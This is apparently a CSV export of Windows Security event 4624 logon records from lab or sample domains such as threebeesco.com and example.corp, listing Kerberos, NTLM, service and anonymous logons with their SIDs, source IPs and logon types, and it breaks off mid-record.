+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 72742 + + + + + Security + 02694w-win10.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + THREEBEESCO.COM + 0x8a38de + 3 + Kerberos + Kerberos + - + 35D5E180-95BD-9ED7-7EFE-C355D7215A87 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50163 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 72742 + + + + + Security + 02694w-win10.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + THREEBEESCO.COM + 0x8a38de + 3 + Kerberos + Kerberos + - + 35D5E180-95BD-9ED7-7EFE-C355D7215A87 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50163 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-03-18T15:06:29.911579+04:00,1552907189.911579,4624,user01,EXAMPLE,9,seclogo,::1,,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 432903 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x4530f0f + 9 + seclogo + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x3ec + C:\Windows\System32\svchost.exe + ::1 + 0 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563342 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x116c7b + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + ::1 + 55589 + %%1833 + +" +2019-03-19T02:16:09.458302+04:00,1552947369.458302,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563300 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x110085 + 3 + Kerberos + Kerberos + + 31E347DC-FF67-08B3-EADC-1EC267B1975B + - + - + 0 + 0x0 + - + 10.0.2.17 + 49249 + %%1833 + +" +2019-03-19T02:15:49.676748+04:00,1552947349.676748,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,PC01,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563297 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x10fc09 + 3 + NtLmSsp + NTLM + PC01 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 10.0.2.17 + 49249 + %%1833 + +" +2019-03-19T02:15:49.614293+04:00,1552947349.614293,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563294 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x10fbeb + 3 + Kerberos + Kerberos + + BAEC19DA-130D-80F0-BD26-78045EE64D62 + - + - + 0 + 0x0 + - + 10.0.2.17 + 49249 + %%1833 + +" +2019-03-19T02:15:49.598756+04:00,1552947349.598756,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563285 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x10fbcc + 3 + Kerberos + Kerberos + + BAEC19DA-130D-80F0-BD26-78045EE64D62 + - + - + 0 + 0x0 + - + 10.0.2.17 + 49244 + %%1833 + +" +2019-03-19T02:15:49.567435+04:00,1552947349.567435,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563265 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x10fac2 + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 55585 + %%1840 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982101 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x73b44c + 3 + Kerberos + Kerberos + - + E8C9AC4A-31FC-C37F-B4D7-B3217C608858 + - + - + 0 + 0x0 + - + ::1 + 64849 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982097 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738cf9 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50616 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982092 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738ce4 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50614 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982089 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738afd + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50613 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982084 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + THREEBEESCO.COM + 0x738ae4 + 3 + Kerberos + Kerberos + - + DCED4BA6-CF24-37EF-0627-B0E4EED7F565 + - + - + 0 + 0x0 + - + 172.16.66.19 + 50609 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566894 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x18423d + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 56034 + %%1840 + +" +2019-03-19T04:02:21.929554+04:00,1552953741.929554,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566889 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x184212 + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + ::1 + 56033 + %%1833 + +" +2019-03-19T04:02:04.319945+04:00,1552953724.319945,4624,Administrator,EXAMPLE,3,NtLmSsp,-,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566835 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2d2 + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + +" +2019-03-19T04:02:04.241919+04:00,1552953724.241919,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566830 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2c0 + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 10.0.2.17 + 49237 + %%1833 + +" +2019-03-19T04:02:04.226251+04:00,1552953724.226251,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566826 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2aa + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 10.0.2.17 + 49236 + %%1833 + +" +2019-03-19T04:02:04.210688+04:00,1552953724.210688,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,NULL,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566823 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x17e29a + 3 + NtLmSsp + NTLM + NULL + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 10.0.2.17 + 49236 + %%1833 + +" +2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5323 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x7d4f4 + 3 + NtLmSsp + NTLM + PC01 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 10.0.2.17 + 49169 + +" +2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5322 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x73d02 + 3 + NtLmSsp + NTLM + PC01 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 10.0.2.17 + 49168 + +" +2019-02-13T19:29:41.418441+04:00,1550071781.418441,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5319 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC02 + 0x4a26d + 2 + User32 + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x994 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 0 + +" +2019-02-13T19:27:53.653483+04:00,1550071673.653483,4624,IEUser,PC02,10,User32,127.0.0.1,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5315 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC02 + 0x45120 + 10 + User32 + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x658 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 49164 + +" +2019-02-13T19:25:17.799376+04:00,1550071517.799376,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5308 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC02 + 0x21f73 + 2 + User32 + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x198 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 0 + +" +2019-02-13T19:19:51.259835+04:00,1550071191.259835,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5305 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:17:38.779337+04:00,1550071058.779337,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5303 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:17:38.018243+04:00,1550071058.018243,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5302 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x113f5 + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 0 + 0x0 + - + - + - + +" +2019-02-13T19:15:08.821952+04:00,1550070908.821952,4624,sshd_server,PC02,5,Advapi,-,PC02,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5299 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-21-3583694148-1414552638-2922671848-1002 + sshd_server + PC02 + 0xe509 + 5 + Advapi + Negotiate + PC02 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:08.689762+04:00,1550070908.689762,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5296 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:07.852561+04:00,1550070907.852561,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5293 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:07.422945+04:00,1550070907.422945,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5291 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:05.924796+04:00,1550070905.924796,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5289 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:05.660417+04:00,1550070905.660417,4624,LOCAL SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5287 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:05.065564+04:00,1550070905.065564,4624,NETWORK SERVICE,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5285 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-20 + NETWORK SERVICE + NT AUTHORITY + 0x3e4 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:04.911343+04:00,1550070904.911343,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5283 + + + + + Security + PC02.example.corp + + + + + S-1-5-18 + PC02$ + EXAMPLE + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1d0 + C:\Windows\System32\services.exe + - + - + +" +2019-02-13T19:15:04.635947+04:00,1550070904.635947,4624,SYSTEM,NT AUTHORITY,0,-,-,-,PC02.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 5281 + + + + + Security + PC02.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 0 + - + - + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x4 + + - + - + +" +2019-02-13T19:15:04.135227+04:00,1550070904.135227,4624,SYSTEM,NT 